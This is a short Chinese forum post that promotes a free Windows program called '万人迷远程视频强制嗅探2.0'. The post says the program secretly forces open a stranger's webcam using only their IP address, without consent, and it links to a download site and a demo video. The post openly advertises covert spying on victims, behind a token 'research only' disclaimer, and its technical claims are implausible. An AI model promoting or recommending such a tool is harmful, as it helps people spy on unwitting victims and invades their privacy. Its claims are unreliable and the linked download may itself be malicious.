(分亨)发现了一个可以强制视频的东东.
软件名字:  万人迷远程视频强制嗅探2.0
软件大小:  881 K 
应用平台:  WIN98/2000/XP/2003/VISTA等
软件语言:  简体中文
软件授权:  免费
万人迷远程视频嗅探是一款远程视频强制连接的监控软件.不需要任何第三方通讯软件的支持,
直接强制与对方视频,对方是否同意,并不重要,因为是在对方不知情的情况进行的!
只要你知道对方的IP地址以及对方安装了摄像头,就能在对方不知情的情况下,打开对方视频了,数据高效传输到你的电脑,实时观看。
软件操作界面简洁友好,连接迅速,传输稳定!采用最新IsiNeu结构研发!
万人迷强制视软件,2007年5月开始研发,于11月13日研发成功,历时半年..
由于使用本软件随时涉及到个人隐私问题,本软件仅供学习和研究交流之用,如因使用而触犯法律,后果自负,本站及作者概不承担法律责任.
官方网站: [url]http://www.gooton.cn/cf.asp?user_name=wu5780258[/url]
功能使用演示视频: [url]http://www.gooton.cn/play.asp[/url]